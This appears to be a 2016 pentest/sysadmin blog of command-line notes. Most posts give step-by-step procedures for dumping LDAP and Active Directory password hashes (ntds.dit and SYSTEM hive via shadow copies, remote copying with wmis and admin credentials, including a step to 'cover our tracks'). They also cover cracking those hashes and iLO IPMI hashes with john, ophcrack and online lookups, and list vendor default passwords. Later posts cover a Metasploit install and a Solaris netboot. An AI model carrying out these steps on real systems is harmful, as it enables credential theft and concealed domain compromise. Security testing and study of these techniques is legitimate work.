# paste -d : userpassword.left userpassword.right > userpassword.out
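if python isn't handy, the same base64-to-hex conversion works with coreutils:

```shell
#!/bin/bash
# decode one base64 value to lowercase hex (what jtr and hashid want)
b64_to_hex() {
  printf '%s' "$1" | base64 -d | od -An -tx1 | tr -d ' \n'
}

# line-by-line, same as the python version:
# while read -r line; do b64_to_hex "$line"; echo; done < userpassword.base64
```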
and if you can't figure out what you have in terms of hashes, use hash-identifier for singletons.
use hashid for lists.
# hashid userpassword.right -o userpassword.hashid
after base64 conversion, of course.
Wednesday, October 26, 2016
LDAP attributes for password extraction
for ldap attribute extraction the following are key:
Filter: (objectClass=*)
Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword
i have access to an openldap server. yes!
the search DN is:
dc=my,dc=pants,dc=com
valid user accounts are kept:
ou=users,DN
retired user accounts are kept:
ou=yawn,DN
let's grab passwords...
ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword \
-h ldap.my.pants.com -b "dc=my,dc=pants,dc=com" -LLL \
-v "(objectClass=*)" sambaLMPassword > lmpassword
i know that all valid accounts have this format:
dn: uid=username
some places have a different dn: than the valid logon id.
those can be simply the attribute uid=username
my script below is to slice and dice "dn: uid="
when doing the ldap dump, however, attributes may be juggled. more advanced
text sorting is required for proper formatting... i digress.
#!/bin/bash
dumporig=userpassword
dump=userpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump <-- remove groups as dumped
sed -i '/sambaDomainName/d' $dump <-- there are no passes for me here
sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump <-- admin has cn: as do others
sed -i '/^$/d' $dump <-- blank lines be gone
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn
sed -i 's/,dc=my,dc=pants,dc=com//g' $dump <-- removing dangling dn
sed -i '/dc=my/d' $dump <-- removing dangling dn
sed -i 's/dn:\ uid=//g' $dump <-- we only want uid
sed -i '/dn:\ /d' $dump <-- for records that only have leading dn:
sed -i ':a;N;$!ba;s/\n/blast/g' $dump <-- fun with line breaks
sed -i 's/userPassword::/userPassword:/g' $dump <-- converting attribute. some are :: others :
sed -i 's/userPassword//g' $dump <-- remove the string altogether. one : remains
sed -i 's/blast:\ /:/g' $dump <-- fun
sed -i 's/blast/\n/g' $dump <-- convert fun to a new line
sed -i '/:/!d' $dump <-- no : ? go away
sed -i '/^:/d' $dump <-- start with : ? go away
sed -i 's/=//g' $dump <-- remove trailing =
sort -u $dump > $dump.out <-- sort the output
rm $dump <-- remove temp file
for LMPassword it is a little simpler.
NTPassword is the same; replace the LMPassword attribute for file
processing.
#!/bin/bash
dumporig=lmpassword
dump=lmpassword.sed
cp $dumporig $dump
sed -i '/ou=groups/d' $dump
sed -i '/sambaDomainName/d' $dump
sed -i '/dn:\ cn=/d' $dump
sed -i '/^$/d' $dump
sed -i '/^uid:\ /d' $dump <-- removing uid if we dumped it
sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump
sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump
sed -i '/dc=my/d' $dump
sed -i 's/dn:\ uid=//g' $dump
sed -i ':a;N;$!ba;s/\n/blast/g' $dump
sed -i 's/sambaLMPassword//g' $dump
sed -i 's/blast:\ /:/g' $dump
sed -i 's/blast/\n/g' $dump
sed -i '/:/!d' $dump
sort -u $dump > $dump.out
rm $dump
but... what is the rootdn password to access the openldap server?
it is found here:
/etc/ldap/slapd.conf
scroll down to:
rootdn
another account worth checking is replicator, but
it may be restricted to certain hosts.
rootdn "cn=admin,dc=my,dc=pants,dc=com"
moduleload syncprov.la
overlay syncprov
syncprov-checkpoint 100 10
syncprov-sessionlog 100
rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p
crack that password by placing the following in a text file, say slap.out:
rootpw:{SSHA}VDE302qCXhD2yqF/woV4XI5hAcS1ds6p
/opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out
* note: --format=salted-sha1-opencl may barf:
Build log: ptxas error : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)
it is only one password...
however.
if you are able to grab an ldif, things are way easier.
sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out
this has you searching for the strings "dn:" and "Password" and printing their lines out in that
order to an output file.
easy. then you parse away.
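a quick demo of that sed filter against a toy ldif (dns and values invented):

```shell
#!/bin/bash
# keep only the dn: and *Password* lines, drop the rest
ldif=$(mktemp)
cat > "$ldif" <<'EOF'
dn: uid=alice,ou=users,dc=my,dc=pants,dc=com
cn: Alice
userPassword:: e1NTSEF9Li4u
dn: uid=bob,ou=users,dc=my,dc=pants,dc=com
cn: Bob
EOF
sed -e '/dn:/b' -e '/Password/b' -e d "$ldif"
```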
password cracking post john
post dsusers.py and john...
let's say you've cracked away and can't crack the hash.
someone may already have for you.
findmyhash is an automated way to search online databases:
# findmyhash TYPE -h "hash" -g (searches the Google)
Do a batch job because you don't want to copy and paste
your life away (no Google, sorry):
# findmyhash TYPE -f FILE
...
that's useful, but doing things with a file is the way to go.
here's how to create a file with post-cracked john LANMAN
passes... the below shows what's left, does some formatting,
removes the first couple of fields, and dumps the type of password.
# john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \
cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only
however, the findmyhash man pages state that for LANMAN/NT hashes
having both hashes is best. dsusers.py ophc format does this for us...
ophcrack files are formatted thus:
uid::lmhash:nthash:sid::
we want columns 3 and 4.
note: not all active directory accounts have a stored LANMAN password. crud.
that's why we're using sed to remove the leading : . joy.
# cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only
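a quick check of that field math on a fabricated oph line (the hashes below are the well-known empty LM/NT hashes, the uids and sids are invented):

```shell
# uid::lmhash:nthash:sid:: -- fields 3 and 4 are the hashes
line='1000::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:S-1-5-21-1::'
echo "$line" | cut -d":" -f3,4

# an account with no stored LANMAN hash leaves field 3 empty,
# hence the sed to strip the leading colon:
noln='1001:::31d6cfe0d16ae931b73c59d7e0c089c0:S-1-5-21-2::'
echo "$noln" | cut -d":" -f3,4 | sed 's/^://'
```

the first line prints lmhash:nthash; the second prints just the nthash with the leading colon gone.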
now plug it in:
# findmyhash LM -f nthash.only
yay! our passwords are all over the internets. who knew?
..
a cracking interlude...
passwords found in LDAP databases can be challenging.
TYPE can be any of: MD5, CRYPT, DES, NT, LANMAN
gross. just gross. but... if the passwords you're accessing are
from an LDAP-Samba database, get at one of those passwords and
you're golden. figuring out the hash type is the hard part.
hash-identifier may be of use.
# hash-identifier
place hash on HASH: line
and then you can use the same format as above with findmyhash.
only, specify MD5, CRYPT...
Monday, October 24, 2016
ophcrack and jtr coexisting notes
when using ophcrack and dsusers.py do not specify lmhash as dsusers.py will
place the lmhashes and nthashes in the same file for use by ophcrack.
python ~/ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \
--passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system
when running ophcrack via a cracking rig, here's the format:
# ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \
-t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \
-f ~/oph/domain-nthash.oph
-l log of work
-o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.
-d location of rainbow tables
-t are the rainbow table directories
-f the oph hash file
let's say you've already run your grabbed hashes through john and want to crack the
leftovers via ophcrack.
# ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \
sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort
# sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph
# gawk -F:: '
FNR==NR {a[NR]=$1; next};
{b[$1]=$0}
END{for (i in a) if (a[i] in b) print b[a[i]]}
' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph.sort-new domain-nthash.oph
Friday, October 21, 2016
jtr and wordlists notes
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst
# cat local-upper.lst >> local.lst
if you're cracking des or nt or pretty much anything that is not solely uppercase
and want to eventually feed it into lm brute forcing:
# dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase
Thursday, October 20, 2016
dumping ad passwords and cracking with jtr
yes, some people use the euphemism "windows domain controller password audit." but, let's
call it what it is: dumping ad and getting password hashes. i'm using jtr.
........................................
on a domain Controller using a privileged account:
C:\ vssadmin list shadows
none. okay.
* where's ntds.dit ? take note.
C:\Windows\NTDS\ntds.dit
* make a system dir
C:\ mkdir C:\Windows\system
* make a shadow copy of C:\
* C:\ vssadmin create shadow /for=C:
you should see:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
* C:\Users\administrator>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.
Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}
Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM
Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}
Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\
Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
Originating Machine: domain-dc1.domain
Service Machine: domain-dc1.domain
Provider: 'Microsoft Software Shadow Copy provider 1.0'
Type: ClientAccessible
Attributes: Persistent, Client-accessible, No auto release, No writers,
Differential
* next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.
that would be from the shadow volume NTDS location to, say, C:\
C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\NTDS\ntds.dit C:\
1 file(s) copied.
* copy SYSTEM hive
C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo
py1\Windows\System32\config\SYSTEM C:\
1 file(s) copied.
* let's cover our tracks and prevent others from grabbing dit and SYSTEM
C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250
........................................
a linux interlude... if you have admin creds
and do not have access to a console and do
not want to have access to a console
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# apt-get install wmis
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
vssadmin list shadows > c:\output.txt"
# cat /root/mnt/output.txt
look for ShadowCopy; that is where you'll find ntds.dit and SYSTEM
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
# wmis -U DOMAIN/administrator%weakpassword //192.168.5.13 "cmd.exe /c
copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"
# ls /root/mnt
ntds.dit SYSTEM
........................................
linux ubuntu/debian rig
install base packages:
# apt-get install cifs-utils autoconf automake autopoint libtool pkg-config
offline processing tools:
libesedb
# git clone https://github.com/libyal/libesedb.git
# cd libesedb/
# ./synclibs.sh
# ./autogen.sh
# ./configure
# make && make install
# ldconfig <- load library
creddump
# git clone https://github.com/moyix/creddump.git
ntdsextract
# git clone https://github.com/csababarta/ntdsxtract.git
get cracking!
# mount -t cifs //192.168.5.13/C$ -o username=domain/administrator,password=weakpassword /root/mnt
# mkdir domain
# cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/
# cd ~/libesedb/esedbtools
# ./esedbexport -t ~/domain ~/domain/ntds.dit
(esedbexport appends ".export" to the -t target, so the tables land in ~/domain.export/)
esedbexport 20160924
Opening file.
Exporting table 1 (MSysObjects) out of 12.
Exporting table 2 (MSysObjectsShadow) out of 12.
Exporting table 3 (MSysUnicodeFixupVer2) out of 12.
Exporting table 4 (datatable) out of 12.
Exporting table 5 (hiddentable) out of 12.
Exporting table 6 (link_table) out of 12.
Exporting table 7 (sdpropcounttable) out of 12.
Exporting table 8 (sdproptable) out of 12.
Exporting table 9 (sd_table) out of 12.
Exporting table 10 (MSysDefrag2) out of 12.
Exporting table 11 (quota_table) out of 12.
Exporting table 12 (quota_rebuild_progress_table) out of 12.
Export completed.
# ls ~/domain.export
datatable.3 <- accounts
hiddentable.4
link_table.5 <- db links
MSysDefrag2.9
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer2.2
quota_rebuild_progress_table.11
quota_table.10
sdpropcounttable.6
sdproptable.7
sd_table.8
# python ntdsxtract/dsusers.py ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM
what does that mean?
command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
[+] Started at: Thu, 20 Oct 2016 17:47:21 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: /root/domain/lmhash.out
[-] NT hash output filename: /root/domain/nthash.out
[-] Hash output format: john
The directory (/root/temp) specified does not exists!
Would you like to create it? [Y/N]
# ls ~/domain/
lmhash.out
nthash.out
* feed into jtr and use cracked passes to compose a wordlist suitable for nt format
# ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out
note: lm is not compatible with gpu cracking
# ./john --show lmhash.out
# ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt
# ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out
solaris 11 default passwords
from oracle support:
On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.
well. that's nice. that means jack, right?
Friday, October 14, 2016
dump and crack nis/nis+ password database
yeah well. that was easy.
# ypcat passwd > <file>
# john <file>
# john --show <file>
really.
Thursday, October 13, 2016
afterthefact postgre metasploit user password set
let's just say you set up metasploit with the msf user and forgot to set the password.
you go to msfconsole and see:
Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit
crap.
$ sudo -u postgres psql
\password msf
set the password and quit
\q
edit:
$ sudo nano -w /opt/metasploit-framework/config/database.yml
On the password: line, supply it.
$ echo sigh.
let's crack default factory-shipped hp ilo passwords with john
let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
doing simple alpha or num cracks.
# mkdir -p /opt/john/dictionaries
# cd /opt/john/dictionaries
# crunch 8 8 0123456789 > eightnum.lst <- 890M
# crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
# ./john --session=ipmi32 --fork=8 --format=rakp \
--wordlist=/opt/john/dictionaries/eightnum.lst out.john
gross
let's do it with both wordlists.
# ls /opt/john/dictionaries/ | xargs -t -I files \
./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \
--fork=8 --format=rakp out.john
now you can let it run against all the numbers and all the alpha.
--rules will do crazy upper and lower case (just in case).
although. you may forego using wordlists altogether if you're doing simple alpha or num cracks.
go to /opt/john/john.conf and add the following stanza:
[Incremental:UpperEight]
File = $JOHN/upper.chr
MinLen = 8
MaxLen = 8
CharCount = 26
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.
it may take forever, but, yay.
# ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john
here's something for hp's default random 8-character digit passwords:
[Incremental:DigitsEight]
File = $JOHN/digits.chr
MinLen = 8
MaxLen = 8
CharCount = 10
# ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john
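for a sense of scale, the two stanzas walk very different keyspaces:

```shell
# 8 chars from a 26-letter alphabet vs 8 chars from 10 digits
awk 'BEGIN{printf "%.0f vs %d\n", 26^8, 10^8}'
# -> 208827064576 vs 100000000
```

roughly 2000x more work for the uppercase run. that's the "it may take forever" part.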
for gpu cracking
first, always check how many gpus you have available
# nvidia-smi
0, 1 under the GPU heading means you have two.
then pass those devices to john and get cracking:
# ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john
* this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are
forking the cracking job between the two of them.
Using default input encoding: UTF-8
Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])
Remaining 116 password hashes with 116 different salts
Node numbers 1-2 of 2 (fork)
Device 1@crackingrig: Quadro NVS 295
Device 0@crackingrig: Quadro NVS 295
Press 'q' or Ctrl-C to abort, almost any other key for status
* if you press <enter> <enter>
2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor
1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie
you'll see something similar to the above. notice that the GPU is not frying.
* nb the idea of cores does not apply to gpus, so stick to fork=2 or you might
have a really bad day. really. pay no attention to --list=cuda-devices showing:
Number of stream processors: 8 (1 x 8)
and the thought that it means --fork=8 per processor.
here are some numbers to dissuade you from that:
0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212
2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632
4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905
8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691
16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s 3556p/s 3556c/s 3556C/s GPU:80°C A-214..Administrtor214
Tuesday, October 11, 2016
soup to nuts install of metasploit on ubuntu 14.04 lts
soup to nuts install of metasploit on ubuntu 14.04 lts
..........
install base
* priv
passwd
nano -w /etc/ssh/sshd_config
ssh-keygen -t rsa -b 2048
apt-get update
apt-get upgrade
apt-get install build-essential libreadline-dev libssl-dev libpq5 \
libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \
git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \
libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \
nmap tcpdump subversion cmake bison flex
..........
rbenv
* non-priv
cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL
git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
git clone git://github.com/dcarley/rbenv-sudo.git ~/.rbenv/plugins/rbenv-sudo
exec $SHELL
rbenv install 2.3.1
rbenv global 2.3.1
ruby -v
..........
postgre sql server
* non-priv
sudo -s
su postgres
cd ~
createuser msf -P -S -R -D
createdb -O msf msf
exit
exit
..........
hashcat (not a hot idea on a virtual machine)
* as priv user
sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo
sudo mkdir /usr/bin/OpenCL
cd /opt
wget https://hashcat.net/files/hashcat-3.10.7z
p7zip -d hashcat-3.10.7z
mv hashcat-3.10/ hashcat
cd hashcat
cp hashcat64.bin /usr/bin
ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat
..........
john
* as priv user
apt-get install build-essential libssl-dev yasm libgmp-dev \
libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev \
nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 opencl-headers <- if you have an nvidia gpu
fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
libopenmpi-dev openmpi-bin <- for mpi support
* a gpu note
lshw -C video
rexgen
apt-get install libboost-regex1.54-dev <- meh
svn checkout https://github.com/teeshop/rexgen.git rexgen
cd rexgen/trunk/src/
mkdir build && cd build
cmake ..
make && sudo make install
ldconfig
git clone git://github.com/magnumripper/JohnTheRipper -b bleeding-jumbo john
cd john/src
./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4
* because unicode, yes.
./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
--enable-experimental-code && make -s clean && make -sj4
* if gpu
cd .. && mv run /opt/john
** test gpu
john --list=cuda-devices
john --list=opencl-devices
let's get some password lists
cd /opt/john
mkdir /opt/john/dictionaries
cd /opt/john/dictionaries
cp ../wordlist.lst .
wget http://download.openwall.net/pub/wordlists/all.gz
wget https://download.g0tmi1k.com/wordlists/large/crackstation-human-only.txt.gz
* nb crackstation may show up as a binary file. i'd suggest after extraction:
strings crackstation-human-only.txt > crackstation.txt
fix the environment
edit:
/etc/environment
add /opt/john to PATH
add line JOHN="/opt/john/"
** odds and sods
john --list=formats --format=opencl
john --list=formats --format=cuda
john ~/shadow <- openmp crack session
john --format=sha512crypt-opencl ~/shadow <- opencl session
john --format=sha512crypt-cuda ~/shadow <- cuda session
** add'l chr files
wget https://www.korelogic.com/Resources/Tools/rockyou.chr
wget https://www.korelogic.com/Resources/Tools/rockyou-lanman.chr
* nb http://contest-2010.korelogic.com/rules.html
..........
crunch
* priv user
wget https://sourceforge.net/projects/crunch-wordlist/files/latest/download -O crunch-3.6.tgz
tar xvfz crunch-3.6.tgz
cd crunch3.6 <- extracted directory name may differ per release
make
make install
..........
metasploitframework
* non-priv
cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
sudo chown -R `whoami` /opt/metasploit-framework
cd metasploit-framework
gem install bundler
bundle install
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'
..........
armitage (metasploit gui)
* priv
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver
sudo nano /opt/metasploit-framework/config/database.yml
production:
adapter: postgresql
database: msf
username: msf
password:
host: 127.0.0.1
port: 5432
pool: 75
timeout: 5
sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"
source /etc/profile
..........
run it
* non-priv
msfconsole
Thursday, October 6, 2016
remove solaris 8 jumpstart services from a solaris 8 jumpstart server
yucky gross solaris 8 jumpstart server begone!
# grep -v "^#" /etc/inetd.conf <- shows what is defined.
hashed finger, tftp, &c in /etc/inetd.conf
# pkill -HUP inetd
bash-2.03# rm /etc/ethers
bash-2.03# rm /etc/bootparams
bash-2.03# rm -rf /tftpboot
bash-2.03# rm -rf /jumpstart
# ptree
to determine if bootparamd is forked (saw entries in rpcinfo -p)
443 /usr/sbin/rpc.bootparamd
441 /usr/sbin/in.rarpd -a
looked for rarp in /etc/rc2.d ... then all of /etc
# find . -type f -exec grep -l "rarp" {} +
found it... "*nfs.server"
hashed out rarpd & bootparamd lines
# If /tftpboot exists become a boot server
# if [ -d /tftpboot ]; then
# /usr/sbin/in.rarpd -a
# /usr/sbin/rpc.bootparamd
# fi
Monday, October 3, 2016
netboot solaris 10 via ubuntu 14 using RARP
I did something bad and my Sun T1000 decided to stop booting due to the most
recent patchset.
Luckily ALOM was installed and I could ssh in and see:
Cross trap sync timeout: at cpu_sync.xword[1]: 0x1010
Flow across the console.
This is firmware issue as:
sc> showhost
SPARC-Enterprise-T1000 System Firmware 6.3.10 2007/12/08 15:48
Host flash versions:
Hypervisor 1.3.4 2007/03/28 06:03
OBP 4.25.11 2007/12/07 23:44
POST 4.25.11 2007/12/08 00:10
The patchset is for 6.4. Of course.
Naturally, the T1000 lacks an optical drive or any means of connecting one.
No USB either. Great.
The next option was to do a network boot. Oh boy.
I didn't feel like messing with my production Solaris systems, so I installed Ubuntu 14
with all the prereqs for an old-style Jumpstart server:
* TFTP
* Bootparamd
* NFSv4
* RARP
* Solaris 10 SPARC DVD (here: /opt/sol-10-u9-sparc.iso)
* Solaris Firmware 6.7.13 patch 139435-10 (here: /opt/solaris10.patches/139435-10.zip)
The reason why I am doing RARP is due to the fact that my network already
has a DHCPvM$ server.
With RARP, a client broadcasts its MAC and gets back its IP address. So, by sending out RARP packets, my
Solaris system is able to get an address and not rely on DHCP. Neat? Yeah.
My systems for this exercise are:
netboot
10.97.32.186
hostnix01 10.97.32.166
0A6120A6 (IP as hex)
00:14:4f:e5:f7:9a
..........................................
netboot
..........................................
packages:
# apt-get install rarpd tftpd-hpa bootparamd nfs-kernel-server
rarpd:
# vi /etc/default/rarpd
Change the last line to match the tftpd-hpa directory and the NIC name:
OPTS="-v -b /var/lib/tftpboot/ eth0"
iso mount:
# mkdir -p /media/solaris10
# mkdir -p /opt/solaris10.patches
# mount -o loop /opt/sol-10-u9-sparc.iso /media/solaris10/
nfsd:
Define a share in NFS for this mount point as this mount will be used to serve
the patches. Open the following file:
# vi /etc/exports
Add the following entries:
/media/solaris10/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
/opt/solaris10.patches/ *(insecure,rw,no_root_squash,no_subtree_check,sync)
bootparamd:
# vi /etc/bootparams
hostnix01 root=netboot:/media/solaris10/Solaris_10/Tools/Boot install=netboot:/media/solaris10 boottype=:in
per URL: Some explanation for the above: This defines which host gets the specified
NFS share. NFS4 uses relative pathnames, but I am not using this, so therefore I’ve
specified the absolute path. Note that server: is the hostname of the server running
the NFS service and was mentioned in my post earlier as my server is originally named
"netboot". The name used is the hostname of your server, substitute it to the correct name.
rarpd:
# vi /etc/hosts
Add the following entry:
10.97.32.166 hostnix01
Create the ethers file:
vi /etc/ethers
Add the following entry:
00:14:4f:e5:f7:9a hostnix01
per URL: Replace the MAC address with the MAC of your Sun server. You can change the
hostname as well, but it needs to be the same everywhere!
tftpd:
vi /etc/default/tftpd-hpa
Change the TFTP_ADDRESS line to the following:
TFTP_ADDRESS=":69"
per URL: The configuration of the server is now complete. One last step we need to do is
to copy the netboot kernel for the Sun server. This resides on the mounted Solaris
install image. By default OpenBoot will look for a kernel using TFTP when using network
boot. Based on its IP address it will look for a matching HEX filename. We can find out
which filename that would be by running the following:
# printf "%02X%02X%02X%02X" 10 97 32 166
This will result in the following (for my IP-address):
0A6120A6
The above will be the netboot kernel for the Sun server. Place the netboot kernel in place:
# cp /media/solaris10/Solaris_10/Tools/Boot/platform/sun4v/inetboot /var/lib/tftpboot/0A6120A6
(note: the T1000 is a sun4v box, hence platform/sun4v; older sun4u kit would use platform/sun4u)
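the printf step generalizes; here's a throwaway helper (the function name is mine) that turns any dotted quad into the filename OpenBoot will request:

```shell
# ip2hex: dotted-quad IP -> uppercase hex tftp filename
ip2hex() {
  # word-split the octets on the dots, then print each as two hex digits
  set -- $(echo "$1" | tr '.' ' ')
  printf '%02X%02X%02X%02X\n' "$1" "$2" "$3" "$4"
}
ip2hex 10.97.32.166
# -> 0A6120A6
```

handy when you're serving more than one client out of /var/lib/tftpboot.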
restart the services in order
service tftpd-hpa restart
service bootparamd restart
service nfs-kernel-server restart
service rarpd restart
..........................................
hostnix01
..........................................
# ssh admin@hostnix01-alom (remote management shell)
sc> poweron
sc> console -f
When you see mac address, get into openboot
#.
sc> break -y
Switch back to console and netboot the kernel
sc> console -f
ok > boot net:rarp -avs
* https://docs.oracle.com/cd/E19455-01/805-7228/hbsparcboot-60/index.html
* interactive, verbose, single user mode (does not include install flag)
After waiting next to forever...
# mkdir /tmp/mount
# mount -F nfs 10.97.32.186:/opt/solaris10.patches /tmp/mount
# cd /tmp/mount
# unzip 139435-10.zip
# cd 139435-10
Run the patching command via sysfwdownload. If you see:
"sysfwdownload: file could not be opened"
that means the installer wants the full path to the firmware image:
# ./sysfwdownload /tmp/mount/139435-10/Firmware/SPARC_Enterprise_T1000/Sun_System_Firmware-6_7_13-SPARC_Enterprise_T1000.bin
.......... (10%).......... (20%).......... (30%).......... (41%)..........
(51%).......... (61%).......... (71%).......... (82%).......... (92%)........ (100%)
Download completed successfully
# init 0
Now you should be back at the 'ok' prompt. Now on the ALOM:
sc> poweroff
SC Alert: SC Request to Power Off Host.
SC Alert: Host system has shut down.
sc> setkeyswitch -y normal
sc> flashupdate -s 127.0.0.1
sc> resetsc
Your ssh console will be terminated due to a broken pipe.
ssh back in and issue:
sc> poweron
sc> console -f
And you're back!
verify:
SPARC Enterprise T1000, No Keyboard
Copyright (c) 1998, 2013, Oracle and/or its affiliates. All rights reserved.
